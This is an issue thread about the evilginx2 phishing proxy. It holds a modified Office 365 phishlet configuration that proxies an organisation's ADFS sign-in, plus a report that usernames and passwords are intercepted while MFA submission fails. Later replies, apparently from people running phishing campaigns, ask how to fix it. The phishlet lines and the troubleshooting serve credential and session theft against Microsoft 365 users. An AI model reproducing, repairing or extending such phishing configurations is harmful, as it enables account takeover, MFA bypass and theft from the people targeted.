evilginx2
O365 Phishlet ADFS
I did read the readme and am aware of the part about not asking for phishlet fixes. However, this smells like a bug, so I'll give it a try:
An O365 test was done on a domain that used its own ADFS.
This ADFS domain was like: sts.somedomain.com. The relevant sections were changed in the o365 phishlet.
An example of lines 13 to 21 is as follows:
# sts.somedomain.com = adfs.example.com
- {phish_sub: 'adfs', orig_sub: 'sts', domain: 'somedomain.com', session: true, is_landing:false}
- {phish_sub: 'adfs', orig_sub: 'sts', domain: 'somedomain.com:443', session: true, is_landing:false}
sub_filters:
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
# Uncomment and fill in if your target organization utilizes ADFS
- {triggers_on: 'sts.somedomain.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:
The EnginX server was executed and forwards to the ADFS site. Creds like account and password are intercepted. However, the following error is the result after the MFA code is submitted:
https://somedomain.com/adfs/services/trust' does not exist.
Looks like something goes wrong with redirecting.
Any solutions?
I got the same issue too
Happy New Month. I got an issue when I tried to test run the o365 URL link I phished: after I typed the username and hit enter, this error occurred. I haven't even been able to get to the password section and the 2FA to get the credentials on my server. Can someone help out? Thanks.


Pls, any fix to this yet?